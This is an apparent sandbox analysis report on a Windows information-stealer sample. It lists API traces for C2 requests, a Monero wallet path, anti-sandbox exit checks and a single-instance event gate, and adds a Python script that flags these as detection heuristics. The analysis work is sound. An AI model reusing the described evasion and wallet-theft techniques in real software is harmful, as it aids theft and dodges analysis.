1aabb0 call 1aab10 call 1aaa50 call 1aac30 * 2 call 1aabb0 call 1aab10 * 2 call 1aade0 lstrlen call 1aade0 * 2 lstrlen call 1aade0 HttpSendRequestA 908->909 910 194f0e-194f15 InternetCloseHandle 908->910 1021 194e82-194eac InternetReadFile 909->1021 910->818 1022 194eae-194eb5 1021->1022 1023 194eb7-194f09 InternetCloseHandle call 1aab10 1021->1023 1022->1023 1024 194eb9-194ef7 call 1aacc0 call 1aabb0 call 1aab10 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00194965
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 0019498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00194B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001B0DDE,00000000,?,?,00000000,?,",00000000,?,00E2EBA0), ref: 00194E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00194E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00194E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00194E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00194EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00194F15
                                    • HttpOpenRequestA.WININET(00000000,00E2EA50,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 00194B65
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00194F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------$0$P
                                    • API String ID: 460715078-2327827448
                                    • Opcode ID: 8d4c836782807b71437d2e05b957c63636b23fb0ee16c8af954e475f8a3a4312
                                    • Instruction ID: 7a240daa7a7a93ce1810a99d25f5ca2a69ee3a94b17c5e8ff7484e65a49d7f23
                                    • Opcode Fuzzy Hash: 8d4c836782807b71437d2e05b957c63636b23fb0ee16c8af954e475f8a3a4312
                                    • Instruction Fuzzy Hash: F612FE76910218ABDB55EB90DD62FEEB379AF25300F904199F10662091EF707F48CF66

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 1a5760-1a57c7 call 1a5d20 call 1aab30 * 3 call 1aaa50 * 4 1106 1a57cc-1a57d3 1090->1106 1107 1a5827-1a589c call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1106->1107 1108 1a57d5-1a5806 call 1aab30 call 1aaab0 call 191590 call 1a5440 1106->1108 1134 1a58e3-1a58f9 call 1aade0 StrCmpCA 1107->1134 1138 1a589e-1a58de call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1107->1138 1124 1a580b-1a5822 call 1aabb0 call 1aab10 1108->1124 1124->1134 1139 1a58ff-1a5906 1134->1139 1140 1a5a2c-1a5a94 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1134->1140 1138->1134 1143 1a5a2a-1a5aaf call 1aade0 StrCmpCA 1139->1143 1144 1a590c-1a5913 1139->1144 1270 1a5d13-1a5d16 1140->1270 1163 1a5be1-1a5c49 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1143->1163 1164 1a5ab5-1a5abc 1143->1164 1149 1a596e-1a59e3 call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1144->1149 1150 1a5915-1a5969 call 1aab30 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1144->1150 1149->1143 1250 1a59e5-1a5a25 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1149->1250 1150->1143 1163->1270 1171 1a5bdf-1a5c64 call 1aade0 StrCmpCA 1164->1171 1172 1a5ac2-1a5ac9 1164->1172 1201 1a5c78-1a5ce1 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1171->1201 1202 1a5c66-1a5c71 Sleep 1171->1202 1179 1a5acb-1a5b1e call 1aab30 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1172->1179 1180 1a5b23-1a5b98 call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 1a5b9a-1a5bda call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1180->1275 1201->1270 1202->1106 1250->1143 1275->1171
                                    APIs
                                      • Part of subcall function 001AAB30: lstrlen.KERNEL32(00194F55,?,?,00194F55,001B0DDF), ref: 001AAB3B
                                      • Part of subcall function 001AAB30: lstrcpy.KERNEL32(001B0DDF,00000000), ref: 001AAB95
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A58F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5AA7
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001A5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5478
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5568
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A557F
                                      • Part of subcall function 001A5510: StrStrA.SHLWAPI(00000000,00000000), ref: 001A55B4
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A55D3
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A55FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A59DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 001A5C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: dfc792306acfb941e79d97ed67caeed6f2f31216b61845bcd99c1851d0ac8162
                                    • Instruction ID: dfad504ccc803ad18b5e515fbc217aa4829c4966416f28eed8881d1eb54d26f9
                                    • Opcode Fuzzy Hash: dfc792306acfb941e79d97ed67caeed6f2f31216b61845bcd99c1851d0ac8162
                                    • Instruction Fuzzy Hash: C6E12575A10104ABCB58FBB0DD62DED777EAF66300F808568F50667091EF746B48CBA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 1a19f0-1a1a1d call 1aade0 StrCmpCA 1304 1a1a1f-1a1a21 ExitProcess 1301->1304 1305 1a1a27-1a1a41 call 1aade0 1301->1305 1309 1a1a44-1a1a48 1305->1309 1310 1a1a4e-1a1a61 1309->1310 1311 1a1c12-1a1c1d call 1aab10 1309->1311 1313 1a1bee-1a1c0d 1310->1313 1314 1a1a67-1a1a6a 1310->1314 1313->1309 1316 1a1a99-1a1aa8 call 1aab30 1314->1316 1317 1a1b1f-1a1b30 StrCmpCA 1314->1317 1318 1a1bdf-1a1be9 call 1aab30 1314->1318 1319 1a1afd-1a1b0e StrCmpCA 1314->1319 1320 1a1a71-1a1a80 call 1aab30 1314->1320 1321 1a1acf-1a1ae0 StrCmpCA 1314->1321 1322 1a1aad-1a1abe StrCmpCA 1314->1322 1323 1a1b82-1a1b93 StrCmpCA 1314->1323 1324 1a1b63-1a1b74 StrCmpCA 1314->1324 1325 1a1bc0-1a1bd1 StrCmpCA 1314->1325 1326 1a1b41-1a1b52 StrCmpCA 1314->1326 1327 1a1ba1-1a1bb2 StrCmpCA 1314->1327 1328 1a1a85-1a1a94 call 1aab30 1314->1328 1316->1313 1341 1a1b3c 1317->1341 1342 1a1b32-1a1b35 1317->1342 1318->1313 1339 1a1b1a 1319->1339 1340 1a1b10-1a1b13 1319->1340 1320->1313 1337 1a1aee-1a1af1 1321->1337 1338 1a1ae2-1a1aec 1321->1338 1335 1a1aca 1322->1335 1336 1a1ac0-1a1ac3 1322->1336 1347 1a1b9f 1323->1347 1348 1a1b95-1a1b98 1323->1348 1345 1a1b80 1324->1345 1346 1a1b76-1a1b79 1324->1346 1329 1a1bdd 1325->1329 1330 1a1bd3-1a1bd6 1325->1330 1343 1a1b5e 1326->1343 1344 1a1b54-1a1b57 1326->1344 1349 1a1bbe 1327->1349 1350 1a1bb4-1a1bb7 1327->1350 1328->1313 1329->1313 1330->1329 1335->1313 1336->1335 1354 1a1af8 1337->1354 1338->1354 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1313 1346->1345 1347->1313 1348->1347 1349->1313 1350->1349 1354->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 001A1A15
                                    • ExitProcess.KERNEL32 ref: 001A1A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 769e7cdc8246f3e01483c8c256fcbaa8a38087df3e028c4dc47718a1cefe6a06
                                    • Instruction ID: afbd6198574a991b70e59e38f2fcb943446ad2ff775d26680ba527c0de9cd7df
                                    • Opcode Fuzzy Hash: 769e7cdc8246f3e01483c8c256fcbaa8a38087df3e028c4dc47718a1cefe6a06
                                    • Instruction Fuzzy Hash: 66510EB8B04209EFCB14DFE4D955AEE77B9EF45704F104498F802AB290E774E941CB62

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20DD0), ref: 001A9BF1
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20F50), ref: 001A9C0A
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E00), ref: 001A9C22
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20C68), ref: 001A9C3A
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20C98), ref: 001A9C53
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E29290), ref: 001A9C6B
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E14F40), ref: 001A9C83
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E14F60), ref: 001A9C9C
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20CC8), ref: 001A9CB4
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20CE0), ref: 001A9CCC
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E30), ref: 001A9CE5
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E60), ref: 001A9CFD
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E15120), ref: 001A9D15
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E48), ref: 001A9D2E
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001911D0: ExitProcess.KERNEL32 ref: 00191211
                                      • Part of subcall function 00191160: GetSystemInfo.KERNEL32(?), ref: 0019116A
                                      • Part of subcall function 00191160: ExitProcess.KERNEL32 ref: 0019117E
                                      • Part of subcall function 00191110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0019112B
                                      • Part of subcall function 00191110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00191132
                                      • Part of subcall function 00191110: ExitProcess.KERNEL32 ref: 00191143
                                      • Part of subcall function 00191220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0019123E
                                      • Part of subcall function 00191220: ExitProcess.KERNEL32 ref: 00191294
                                      • Part of subcall function 001A6A10: GetUserDefaultLangID.KERNEL32 ref: 001A6A14
                                      • Part of subcall function 00191190: ExitProcess.KERNEL32 ref: 001911C6
                                      • Part of subcall function 001A79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                      • Part of subcall function 001A79E0: RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                      • Part of subcall function 001A79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                      • Part of subcall function 001A7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                      • Part of subcall function 001A7A70: RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
                                      • Part of subcall function 001A7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 001A6D99
                                    • Sleep.KERNEL32(00001770), ref: 001A6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6DBA
                                    • ExitProcess.KERNEL32 ref: 001A6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 6c9d2426087bde9e2b2afc12aee940a2d2d605d97e839db03acc7914ce9a9b0c
                                    • Instruction ID: 33fabfa15b199c48dea8bad27f6273cc099b874c58a6045f99707c86a5e3fcb2
                                    • Opcode Fuzzy Hash: 6c9d2426087bde9e2b2afc12aee940a2d2d605d97e839db03acc7914ce9a9b0c
                                    • Instruction Fuzzy Hash: B0316F78A44204BBDB44FBF0DC67BFE7379AF26340F540929F112A2192EF706A04C666

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 1a6d93 1437 1a6daa 1436->1437 1439 1a6d5a-1a6d77 call 1aade0 OpenEventA 1437->1439 1440 1a6dac-1a6dc2 call 1a6bc0 call 1a5d60 CloseHandle ExitProcess 1437->1440 1446 1a6d79-1a6d91 call 1aade0 CreateEventA 1439->1446 1447 1a6d95-1a6da4 CloseHandle Sleep 1439->1447 1446->1440 1447->1437
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 001A6D99
                                    • Sleep.KERNEL32(00001770), ref: 001A6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6DBA
                                    • ExitProcess.KERNEL32 ref: 001A6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: f95cd8bf548ac35a5115bd5492419dd645d5bf33b99ef6cc8622125bc0f47d74
                                    • Instruction ID: 5190be703f406d199a2b1f6f4be0088b723af960335d0710baccf15f974ec5ab
                                    • Opcode Fuzzy Hash: f95cd8bf548ac35a5115bd5492419dd645d5bf33b99ef6cc8622125bc0f47d74
                                    • Instruction Fuzzy Hash: 8DF08278B48209AFEB54BBE0DC0ABBD3374AF26745F180525F652A51D0DBF05500CA66
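The API traces above record three behaviours worth pulling out of a report like this automatically: the StrCmpCA-against-"ERROR" loop at 0x1A5760 that sleeps 0xEA60 ms (60 s) before retrying the C2, the subcall functions (0x191160, 0x191110, 0x191220) where a host-profiling call is immediately followed by ExitProcess, and the OpenEventA / CreateEventA / Sleep(0x1770) / ExitProcess sequence at 0x1A6D5A that uses a named event as an "already running" gate. The script below is an added example written for this page, not Joe Sandbox code and not part of the sample: it parses the report's "APIs" line format into records and applies those three heuristics. The trace lines embedded in it are copied from the function blocks above; the thresholds (a "long" sleep is 30 s or more) and the set of APIs treated as host-profiling are this example's own assumptions.

```python
"""Parse Joe Sandbox 'APIs' trace lines and flag retry loops, exit-gated host
checks and single-instance event gates.  Added example for this report; the
heuristics are this script's own, not Joe Sandbox signatures."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample: trace lines copied from the function blocks on this page
# (0x1A5760 retry loop, subcalls lifted into 0x1A6D5A, and 0x1A6D5A itself).
SAMPLE_TRACE = """\
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5894
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5C5C
• Sleep.KERNEL32(0000EA60), ref: 001A5C6B
  • Part of subcall function 00191160: GetSystemInfo.KERNEL32(?), ref: 0019116A
  • Part of subcall function 00191160: ExitProcess.KERNEL32 ref: 0019117E
  • Part of subcall function 00191110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00191132
  • Part of subcall function 00191110: ExitProcess.KERNEL32 ref: 00191143
  • Part of subcall function 00191220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0019123E
  • Part of subcall function 00191220: ExitProcess.KERNEL32 ref: 00191294
  • Part of subcall function 001A6A10: GetUserDefaultLangID.KERNEL32 ref: 001A6A14
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6D6A
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A6D88
• CloseHandle.KERNEL32(00000000), ref: 001A6D99
• Sleep.KERNEL32(00001770), ref: 001A6DA4
• ExitProcess.KERNEL32 ref: 001A6DC2
"""

# One trace line: optional "Part of subcall function X:" prefix, then
# Api.MODULE(args) or bare Api.MODULE, then "ref: <call-site address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption: APIs that only make sense as sandbox/host profiling when each is
# paired with ExitProcess in the same small function (CPU count, NUMA support,
# physical RAM, default language).
RECON_APIS = {"GetSystemInfo", "VirtualAllocExNuma", "GlobalMemoryStatusEx", "GetUserDefaultLangID"}
EVENT_ALL_ACCESS = 0x1F0003  # first argument of the OpenEventA call above


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]          # argument tokens as printed; '?' means unresolved
    ref: int                 # call-site address
    subcall: Optional[int]   # function the call was lifted from, or None for top level


def parse_trace(text: str) -> list[ApiCall]:
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def hex_arg(call: ApiCall, i: int) -> Optional[int]:
    """Decode argument i when the report printed it as a hex constant."""
    if i < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]+", call.args[i]):
        return int(call.args[i], 16)
    return None


def sleep_intervals_ms(calls: list[ApiCall]) -> list[Optional[int]]:
    return [hex_arg(c, 0) for c in calls if c.api == "Sleep"]


def exit_gated_checks(calls: list[ApiCall]) -> list[int]:
    """Subcall functions that both profile the host and call ExitProcess."""
    by_func: dict[int, set[str]] = defaultdict(set)
    for c in calls:
        if c.subcall is not None:
            by_func[c.subcall].add(c.api)
    return sorted(f for f, apis in by_func.items() if apis & RECON_APIS and "ExitProcess" in apis)


def single_instance_gate(calls: list[ApiCall]) -> Optional[dict]:
    """OpenEventA followed by CreateEventA in top-level flow: named-event 'already running' check."""
    top = [c for c in calls if c.subcall is None]
    for i, c in enumerate(top):
        if c.api == "OpenEventA":
            later = {x.api for x in top[i + 1:]}
            if "CreateEventA" in later:
                access = hex_arg(c, 0)
                return {"ref": c.ref, "access": access,
                        "all_access": access == EVENT_ALL_ACCESS,
                        "sleeps_then_retries": "Sleep" in later,
                        "exits": "ExitProcess" in later}
    return None


def c2_retry_loop(calls: list[ApiCall], min_sleep_ms: int = 30_000) -> Optional[dict]:
    """StrCmpCA against the literal 'ERROR' plus a long Sleep: poll-until-C2-answers loop."""
    error_cmps = [c for c in calls if c.api == "StrCmpCA" and "ERROR" in c.args]
    long_sleeps = [c for c in calls if c.api == "Sleep" and (hex_arg(c, 0) or 0) >= min_sleep_ms]
    if error_cmps and long_sleeps:
        return {"compares": len(error_cmps), "sleep_ms": hex_arg(long_sleeps[0], 0)}
    return None


def analyse(text: str) -> dict:
    calls = parse_trace(text)
    return {
        "sleeps_ms": sleep_intervals_ms(calls),
        "exit_gated_checks": exit_gated_checks(calls),
        "single_instance_gate": single_instance_gate(calls),
        "c2_retry_loop": c2_retry_loop(calls),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

Running it on the embedded lines reports the two sleep intervals (60000 ms and 6000 ms), the three exit-gated profiling functions, the event gate at 0x1A6D6A opened with EVENT_ALL_ACCESS, and the "ERROR" retry loop. GetUserDefaultLangID is not flagged, because the ExitProcess that follows it sits in a different function (0x191190) in this trace; pasting that function's lines in would flag it too.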

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 6004e8783291a3f48904fe178f2125ff6f30622a6d2bd9e2ab5a4c060bc80cd5
                                    • Instruction ID: 6658f195247a47ea80f7b629d43c12162d0d0146e8070ced76620002d5dccf79
                                    • Opcode Fuzzy Hash: 6004e8783291a3f48904fe178f2125ff6f30622a6d2bd9e2ab5a4c060bc80cd5
                                    • Instruction Fuzzy Hash: BD213EB1D00209ABDF14DFA5EC46ADE7B74BF45320F508625F915A7290EB706A0ACB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001962D0: InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                      • Part of subcall function 001962D0: StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                      • Part of subcall function 001962D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
                                      • Part of subcall function 001962D0: HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                      • Part of subcall function 001962D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                      • Part of subcall function 001962D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: d72ad7627d1bfd050d1495d340565a5af9e9818108916f18e185ea0e9c119b23
                                    • Instruction ID: b993af58ce70d56ae7c647db85383e160a0f0b4caf6023224c862985123a7404
                                    • Opcode Fuzzy Hash: d72ad7627d1bfd050d1495d340565a5af9e9818108916f18e185ea0e9c119b23
                                    • Instruction Fuzzy Hash: A5111234A00108ABDB54FFB4DDA2AED7379AF61340FC14558F91A57492EF30AB04CA61

                                    Control-flow Graph

                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0019123E
                                    • ExitProcess.KERNEL32 ref: 00191294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: d0e721109dd94748d532a2c16113d0e079f96f39a5c1fe85f0eac33f8653eb45
                                    • Instruction ID: bda992c0bd4e7b198798f8b08d337291d7b05a496766f1471ba767a7f3b21aee
                                    • Opcode Fuzzy Hash: d0e721109dd94748d532a2c16113d0e079f96f39a5c1fe85f0eac33f8653eb45
                                    • Instruction Fuzzy Hash: C8016DB0D40308BBEF10EFE4DD4ABAEBB78AB14705F208458F605B62C0D7B455818759
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
